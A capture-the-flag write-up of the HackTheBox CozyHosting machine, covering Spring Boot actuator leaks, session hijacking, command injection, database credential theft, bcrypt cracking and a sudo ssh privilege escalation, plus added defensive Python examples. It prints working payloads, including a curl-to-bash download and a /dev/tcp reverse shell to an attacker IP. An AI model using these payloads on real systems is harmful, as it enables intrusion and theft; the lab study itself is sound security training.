HTB CozyHosting: Detailed Penetration Test Write-up

你是慕鸢呀~ · Published 29 days ago · 11 views · 3163 words · Estimated reading time: 14 minutes



🔍 Initial Reconnaissance

Port scan

Start with a fast Nmap port scan:

nmap -sT -min-rate 20000 10.10.11.230

The scan shows two open ports:

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Run a more detailed service and version scan against those two ports:

nmap -sT -sC -sV -O -p22,80 10.10.11.230

Scan result:

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 43:56:bc:a7:f2:ec:46:dd:c1:0f:83:30:4c:2c:aa:a8 (ECDSA)
|_  256 6f:7a:6c:3f:a6:8d:e2:75:95:d4:7b:71:ac:4f:7e:42 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://cozyhosting.htb
|_http-server-header: nginx/1.18.0 (Ubuntu)

Key findings:

  • SSH service: OpenSSH 8.9p1
  • HTTP service: nginx 1.18.0
  • The site redirects to the domain http://cozyhosting.htb

🌐 Web Application Reconnaissance

Configure the local hosts file

To reach the target site, add a hosts entry for the domain:

echo "10.10.11.230 cozyhosting.htb" | sudo tee -a /etc/hosts

Identifying the web stack

Visiting http://cozyhosting.htb shows that the site uses the Bootstrap v5.2.3 front-end framework; the page source contains the following comment:

<!-- =======================================================
* Template Name: FlexStart
* Updated: Mar 10 2023 with Bootstrap v5.2.3
* Template URL: https://bootstrapmade.com/flexstart-bootstrap-startup-template/
* Author: BootstrapMade.com
* License: https://bootstrapmade.com/license/
======================================================== -->

Directory enumeration

Enumerate directories with feroxbuster:

feroxbuster -u http://cozyhosting.htb/

This reveals a distinctive error page: http://cozyhosting.htb/error

Its content shows that this is a Spring Boot application:

Whitelabel Error Page

This application has no explicit mapping for /error, so you are seeing this as a fallback.
Fri Apr 04 08:15:44 UTC 2025
There was an unexpected error (type=None, status=999).

🔧 Probing the Spring Boot Attack Surface

Building a Spring Boot wordlist

Based on the framework identified above, build a wordlist of common Spring Boot paths, with an emphasis on actuator endpoints.

%20/swagger-ui.html
actuator
actuator/auditevents
actuator/beans
actuator/conditions
actuator/configprops
actuator/env
actuator/flyway
actuator/health
actuator/heapdump
actuator/httptrace
actuator/hystrix.stream
actuator/info
actuator/integrationgraph
actuator/jolokia
actuator/liquibase
actuator/logfile
actuator/loggers
actuator/mappings
actuator/metrics
actuator/prometheus
actuator/scheduledtasks
actuator/sessions
actuator/shutdown
actuator/startup
actuator/swagger-ui.html
actuator/threaddump
actuator/trace
api
api-docs
api.html
api/doc
api/index.html
api/swagger
api/swagger-ui.html
api/swagger/ui
api/swaggerui
api/v2/api-docs
app
application.properties
application.yml
auditevents
autoconfig
beans
caches
cloudfoundryapplication
conditions
configprops
distv2/index.html
docs
doc.html
docs/
druid/index.html
druid/login.html
druid/websession.html
dubbo-provider/distv2/index.html
dump
entity/all
env
env/(name)
error
eureka
flyway
gateway/actuator
gateway/actuator/auditevents
gateway/actuator/beans
gateway/actuator/conditions
gateway/actuator/configprops
gateway/actuator/env
gateway/actuator/health
gateway/actuator/heapdump
gateway/actuator/httptrace
gateway/actuator/hystrix.stream
gateway/actuator/info
gateway/actuator/jolokia
gateway/actuator/logfile
gateway/actuator/loggers
gateway/actuator/mappings
gateway/actuator/metrics
gateway/actuator/scheduledtasks
gateway/actuator/swagger-ui.html
gateway/actuator/threaddump
gateway/actuator/trace
health
heapdump
heapdump.json
httptrace
hystrix
hystrix.stream
info
integrationgraph
intergrationgraph
internal
jolokia
jolokia/list
libs/swaggerui
liquibase
logfile
loggers
login
management
management/health
mappings
metrics
monitor
prometheus
refresh
scheduledtasks
sessions
shutdown
spring
spring-security-oauth
spring-security-oauth-resource/swagger-ui.html
spring-security-rest
spring-security-rest/api/swagger-ui.html
startup
static/swagger.json
sw/swagger-ui.html
swagger
swagger-dubbo/api-docs
swagger-resources
swagger-resources/configuration/security
swagger-resources/configuration/ui
swagger-ui
swagger-ui.html
swagger-ui/html
swagger-ui/index.html
swagger/codes
swagger/index.html
swagger/static/index.html
swagger/swagger-ui.html
swagger/ui
swagger/v1/swagger.json
swagger/v2/swagger.json
Swagger/ui/index
system/druid/index.html
template/swagger-ui.html
threaddump
trace
user/swagger-ui.html
v1.1/swagger-ui.html
v1.2/swagger-ui.html
v1.3/swagger-ui.html
v1.4/swagger-ui.html
v1.5/swagger-ui.html
v1.6/swagger-ui.html
v1.7/swagger-ui.html
v1.8/swagger-ui.html
v1.9/swagger-ui.html
v2.0/swagger-ui.html
v2.1/swagger-ui.html
v2.2/swagger-ui.html
v2.3/swagger-ui.html
v2/api-docs
v2/swagger.json
v3/api-docs
v1/api-docs
webpage/system/druid/index.html

Targeted scan with Gobuster

gobuster dir -u http://cozyhosting.htb -w springboot.txt

Results:

/actuator             (Status: 200) [Size: 634]
/actuator/health      (Status: 200) [Size: 15]
/actuator/env         (Status: 200) [Size: 4957]
/actuator/mappings    (Status: 200) [Size: 9938]
/actuator/sessions    (Status: 200) [Size: 48]
/actuator/beans       (Status: 200) [Size: 127224]
/error                (Status: 500) [Size: 73]
/login                (Status: 200) [Size: 4431]

🔐 Exploiting the Information Leak

Analysing the Actuator endpoints

Visiting http://cozyhosting.htb/actuator lists several sensitive endpoints:

{
  "_links": {
    "self": {
      "href": "http://localhost:8080/actuator",
      "templated": false
    },
    "sessions": {
      "href": "http://localhost:8080/actuator/sessions",
      "templated": false
    },
    "beans": {
      "href": "http://localhost:8080/actuator/beans",
      "templated": false
    },
    "health": {
      "href": "http://localhost:8080/actuator/health",
      "templated": false
    },
    "health-path": {
      "href": "http://localhost:8080/actuator/health/{*path}",
      "templated": true
    },
    "env": {
      "href": "http://localhost:8080/actuator/env",
      "templated": false
    },
    "env-toMatch": {
      "href": "http://localhost:8080/actuator/env/{toMatch}",
      "templated": true
    },
    "mappings": {
      "href": "http://localhost:8080/actuator/mappings",
      "templated": false
    }
  }
}

Retrieving user session information

Visiting http://cozyhosting.htb/actuator/sessions returns the session cookie of user kanderson:

{"20A3E4D50FACFEB1E9E0E877C80B3EBC":"kanderson"}

Analysing the API endpoints

Visiting http://cozyhosting.htb/actuator/mappings reveals a suspicious API endpoint (the full mapping entry is reproduced below):

  • Class name: htb.cloudhosting.compliance.ComplianceService
  • Method name: executeOverSsh, which looks very much like a method that runs a command over SSH
  • Parameter: HttpServletResponse, used to return the result

Vulnerability analysis:

  • This interface very likely has a command injection flaw, since it accepts external input and executes a command over SSH.
  • No security annotations or permission checks are visible, so proper authorization may be missing.
  • The class and method names suggest an internal management function.

Approach:

  • Try reaching the /executessh endpoint with a POST request.
  • Judging from the method signature, it probably expects two parameters.

No concrete lead yet, so keep exploring.

{
  "handler": "htb.cloudhosting.compliance.ComplianceService#executeOverSsh(String, String, HttpServletResponse)",
  "predicate": "{POST [/executessh]}",
  "details": {
    "handlerMethod": {
      "className": "htb.cloudhosting.compliance.ComplianceService",
      "name": "executeOverSsh",
      "descriptor": "(Ljava/lang/String;Ljava/lang/String;Ljakarta/servlet/http/HttpServletResponse;)V"
    },
    "requestMappingConditions": {
      "consumes": [],
      "headers": [],
      "methods": [
        "POST"
      ],
      "params": [],
      "patterns": [
        "/executessh"
      ],
      "produces": []
    }
  }
}
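Added example (not code from the original post or from the CozyHosting application): a small Python audit that parses the HAL discovery document returned by /actuator and a list of dispatcherServlet entries from /actuator/mappings, flags the endpoints that leak sessions, configuration or routing information, reports the backend origin the hrefs give away, and extracts the routes so an undocumented state-changing handler like POST /executessh stands out. The sample JSON is constructed from the output shown on this page; the second mappings entry and the severity notes are this example's own.

```python
import json
import re
from urllib.parse import urlsplit

# Actuator endpoints that leak sessions, secrets or routing data when reachable
# unauthenticated; the notes are this example's own wording.
SENSITIVE = {
    "sessions": "live session ids, reusable as a JSESSIONID cookie",
    "env": "configuration values, often including credentials",
    "heapdump": "JVM heap snapshot with secrets still in memory",
    "mappings": "every route and handler, including undocumented ones",
    "beans": "bean wiring that reveals internal structure",
}

# Constructed sample: a trimmed copy of the GET /actuator response on this box.
SAMPLE_ACTUATOR = """{"_links": {
  "self":     {"href": "http://localhost:8080/actuator", "templated": false},
  "sessions": {"href": "http://localhost:8080/actuator/sessions", "templated": false},
  "beans":    {"href": "http://localhost:8080/actuator/beans", "templated": false},
  "health":   {"href": "http://localhost:8080/actuator/health", "templated": false},
  "env":      {"href": "http://localhost:8080/actuator/env", "templated": false},
  "mappings": {"href": "http://localhost:8080/actuator/mappings", "templated": false}}}"""

# Constructed sample shaped like dispatcherServlet entries from /actuator/mappings:
# the first handler is the real one from this box, the second is made up for contrast.
SAMPLE_MAPPINGS = """[
 {"handler": "htb.cloudhosting.compliance.ComplianceService#executeOverSsh(String, String, HttpServletResponse)",
  "predicate": "{POST [/executessh]}"},
 {"handler": "example.HomeController#index()", "predicate": "{GET [/], produces [text/html]}"}]"""

def exposed_sensitive_endpoints(actuator_json):
    # Map each sensitive endpoint advertised in the discovery document to why it matters.
    links = json.loads(actuator_json)["_links"]
    return {name: SENSITIVE[name] for name in links if name in SENSITIVE}

def upstream_origin(actuator_json):
    # The hrefs carry the app's own address, exposing the backend behind the
    # public nginx (localhost:8080 on this box).
    parts = urlsplit(json.loads(actuator_json)["_links"]["self"]["href"])
    return f"{parts.scheme}://{parts.netloc}"

# "{POST [/executessh]}" -> ("POST", "/executessh"); an empty method means any method.
PREDICATE = re.compile(r"\{(\w*)\s*\[([^\]]+)\]")

def routes_from_mappings(mappings_json):
    # (method, path, handler class) triples to diff against the documented API;
    # non-GET routes such as POST /executessh are the ones to review first.
    routes = []
    for entry in json.loads(mappings_json):
        m = PREDICATE.match(entry["predicate"])
        if m:
            routes.append((m.group(1), m.group(2), entry["handler"].split("#")[0]))
    return routes
```

In Spring Boot 3 the default web exposure is only the health endpoint; every other name this script reports means management.endpoints.web.exposure.include was widened without putting authentication in front of the actuator.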

💉 Session Hijacking and Command Injection

Hijacking the admin session

We obtained user kanderson's cookie in the previous step; use it to hijack the session:

GET /admin HTTP/1.1
Host: cozyhosting.htb
Cookie: JSESSIONID=20A3E4D50FACFEB1E9E0E877C80B3EBC

This gets us into the admin panel. At the bottom there is an automatic patching feature that asks for a hostname and a username, which looks a lot like the executessh interface found earlier, so capture the request it sends.

The captured request:

POST /executessh HTTP/1.1
Host: cozyhosting.htb
Content-Length: 29
Cache-Control: max-age=0
Accept-Language: zh-CN,zh;q=0.9
Origin: http://cozyhosting.htb
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://cozyhosting.htb/admin
Accept-Encoding: gzip, deflate, br
Cookie: JSESSIONID=81DD951EB84E65A9CF45B8083ECA7292
Connection: keep-alive

host=127.0.0.1&username=admin

Analysing the command injection point

Replaying the captured auto-patch request (host=127.0.0.1&username=admin) fails with the following error:

The host was not added!
Host key verification failed.

Judging from the error message, and given that it indicates a private key is in use, the server is most likely running a command of the form ssh -i [key] [username]@[hostname]. If so, I can try for command injection.

🐚 Command Injection and Reverse Shell

Testing command injection

Try injecting the id command through the username parameter:

POST /executessh HTTP/1.1
Host: cozyhosting.htb
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=A37A39D9F3E20676A2C9EAFCE3512410

host=127.0.0.1&username=admin%3Bid

The error response:

The host was not added!
ssh: Could not resolve hostname admin: Temporary failure in name resolution/bin/bash: line 1: id@127.0.0.1: command not found
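Added example, not the CozyHosting application's source: a Python reconstruction of the two ways the /executessh handler could assemble its ssh command. The unsafe builder concatenates the inputs into one line for bash -c, which is what the error above (bash treating id@127.0.0.1 as a separate command) implies; the hardened builder allow-lists both fields and builds an argv vector that never passes through a shell. The key path is a placeholder.

```python
import re

SSH_KEY = "/path/to/placeholder_key"  # placeholder; the real key path is not known

def build_unsafe(host, username):
    # Reconstruction of what the error output implies: one string handed to
    # bash -c, so ';' (and ${IFS}, which bash expands to a space) in either
    # field becomes shell syntax instead of part of the ssh target.
    return ["/bin/bash", "-c", f"ssh -i {SSH_KEY} {username}@{host}"]

def commands_seen_by_bash(argv):
    # Split the bash -c string on ';' the way bash separates simple commands
    # (quoting ignored for this demonstration) to show what actually runs.
    return [c.strip() for c in argv[2].split(";") if c.strip()]

# Allow-lists: a POSIX-style user name and a hostname or IPv4 address.
# Rejecting only spaces (what the box did) still admits ; | $ and ${IFS}.
USERNAME_RE = re.compile(r"[a-z_][a-z0-9_-]{0,31}")
LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
HOST_RE = re.compile(rf"(?:{LABEL}\.)*{LABEL}")

def build_safe(host, username):
    # Validate first, then hand an argv vector to execve with no shell involved:
    # metacharacters cannot be interpreted because nothing parses them.
    if not USERNAME_RE.fullmatch(username):
        raise ValueError("invalid username")
    if not HOST_RE.fullmatch(host):
        raise ValueError("invalid host")
    return ["ssh", "-i", SSH_KEY, "-o", "BatchMode=yes", f"{username}@{host}"]

def accepts(host, username):
    # Convenience wrapper: True only if both inputs pass validation.
    try:
        build_safe(host, username)
        return True
    except ValueError:
        return False
```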

Bypassing the space restriction

Because the hostname is strictly validated, the command cannot contain spaces, so use ${IFS} in place of a space:

# Start a local HTTP server
python3 -m http.server 8000

# Build the payload
admin;curl${IFS}http://10.10.16.16:8000;

Before sending, fetch the latest cookie from cozyhosting.htb/actuator/sessions and substitute it into the request.

Send the injected request; the target makes an HTTP request back to us, confirming command execution.

Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.11.230 - - [04/Apr/2025 20:10:30] "GET / HTTP/1.1" 200 -

Building the reverse shell

Start an nc listener and create the reverse shell script in the directory served by the Python HTTP server:

# Local listener
nc -lvnp 9999

# Create the reverse shell script
echo -e '#!/bin/bash\nsh -i >& /dev/tcp/10.10.16.16/9999 0>&1' > rce.sh

Build the final payload, which makes the target download rce.sh and execute it; barring surprises, this gives us a shell.

# Final payload
admin;curl${IFS}http://10.10.16.16:8000/rce.sh|bash;

Shell obtained:

listening on [any] 9999 ...
connect to [10.10.16.16] from (UNKNOWN) [10.10.11.230] 52656
sh: 0: can't access tty; job control turned off
$ id
uid=1001(app) gid=1001(app) groups=1001(app)

📦 Internal Enumeration

Getting a more stable shell

Use the script command to spawn a new PTY running bash:

script /dev/null -c bash

Examining the JAR configuration

Locate and unpack the application JAR:

unzip -d /tmp/app cloudhosting-0.0.1.jar
cd /tmp/app

Read the Spring Boot configuration file. application.properties holds the Spring Boot configuration and deserves close attention:

cat /tmp/app/BOOT-INF/classes/application.properties

It contains database credentials:

spring.datasource.url=jdbc:postgresql://localhost:5432/cozyhosting
spring.datasource.username=postgres
spring.datasource.password=Vg&nvzAQ7XxR

💾 Database Exploitation

Connecting to PostgreSQL

psql -h 127.0.0.1 -U postgres -W
Password: Vg&nvzAQ7XxR

Enumerating database contents

Note: if a long (END) marker appears at the top of the terminal, press q and Enter to return to the prompt.

-- list available databases
\list

-- connect to the cozyhosting database
\connect cozyhosting

-- list all tables
\dt

-- dump the users table
select * from users;

Query result:

   name    |                           password                           | role  
-----------+--------------------------------------------------------------+-------
 kanderson | $2a$10$E/Vcd9ecflmPudWeLSEIv.cvK6QjxjWlWXpij1NVNV3Mm6eH58zim | User
 admin     | $2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm | Admin

🔓 Password Cracking

Identifying the hash type

hashid '$2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm'

Result:

Analyzing '$2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm'
[+] Blowfish(OpenBSD) 
[+] Woltlab Burning Board 4.x 
[+] bcrypt

Cracking with Hashcat

bcrypt is hash mode 3200 in Hashcat; write the hash to a file and start the attack:

echo '$2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm' > hash
hashcat hash -m 3200 /usr/share/wordlists/rockyou.txt

The password is recovered: manchesterunited

$2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm:manchesterunited

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 3200 (bcrypt $2*$, Blowfish (Unix))
Hash.Target......: $2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib...kVO8dm
Time.Started.....: Fri Apr  4 21:15:41 2025 (17 secs)
Time.Estimated...: Fri Apr  4 21:15:58 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:      164 H/s (5.80ms) @ Accel:8 Loops:16 Thr:1 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 2816/14344385 (0.02%)
Rejected.........: 0/2816 (0.00%)
Restore.Point....: 2752/14344385 (0.02%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:1008-1024
Candidate.Engine.: Device Generator
Candidates.#1....: bebito -> medicina
Hardware.Mon.#1..: Util: 81%

🚩 User Flag

Listing system users

cat /etc/passwd

User josh is present:

josh:x:1003:1003::/home/josh:/usr/bin/bash

Logging in with the cracked password

ssh josh@cozyhosting.htb
# password: manchesterunited

Read the user flag:

josh@cozyhosting:~$ cat user.txt
65279bb4837e0b6b9daacff5d5b2396c

🔝 Privilege Escalation

Checking sudo rights

sudo -l

Output:

User josh may run the following commands on localhost:
    (root) /usr/bin/ssh *

This means the current user can run ssh as root.

I can use this to escalate. Reading the SSH documentation, the -o option lets you set individual configuration options on the command line. Specifically:

PermitLocalCommand=yes allows a local command to run once the SSH connection has been established, and LocalCommand=/bin/bash names that command, so a bash shell opens after the connection succeeds. Because the ssh process runs as root (via sudo), the bash shell inherits root privileges, which completes the escalation.

Escalating through SSH options

Use the SSH options described above to escalate:

sudo /usr/bin/ssh -v -o PermitLocalCommand=yes -o 'LocalCommand=/bin/bash' josh@127.0.0.1

Root obtained:

root@cozyhosting:/home/josh# id
uid=0(root) gid=0(root) groups=0(root)

🏁 Root Flag

root@cozyhosting:/home/josh# cat /root/root.txt
0a5b294329801b320d5fb71a8b3d52b8

🔄 Attack Chain Summary

  1. Reconnaissance: port scanning found open SSH and HTTP services
  2. Web application probing: identified a Spring Boot application and found exposed Actuator endpoints
  3. Exploitation chain:
     • Used the sessions Actuator endpoint to obtain an admin session
     • Used the mappings Actuator endpoint to find the command-execution interface
     • Obtained a reverse shell through command injection
  4. Lateral movement:
     • Recovered database credentials from the application configuration file
     • Extracted and cracked password hashes from the database
     • Logged in over SSH with the cracked password for user-level access
  5. Privilege escalation: abused a restricted sudo rule for ssh to gain root

🛠️ Tools Used

  • Network scanning: Nmap
  • Web directory scanning: Feroxbuster, Gobuster
  • Password cracking: Hashcat
  • Hash identification: hashid
  • Database access: PostgreSQL client

🔍 Key Weaknesses

  1. Exposed Spring Boot Actuator: leaked sensitive system and application information
  2. Command injection: the executeOverSsh method does not properly sanitize user input
  3. Poor credential storage: database password stored in plaintext
  4. Weak password policy: password crackable with a dictionary attack
  5. Unsafe sudo configuration: lets a user run a specific command as root

📚 Recommendations

  1. Disable or restrict Spring Boot Actuator in production
  2. Strictly filter and validate all user input
  3. Store sensitive credentials in environment variables or a secure configuration management tool
  4. Enforce a strong password policy and rotate credentials regularly
  5. Configure sudo according to the principle of least privilege

Last updated 2025-04-12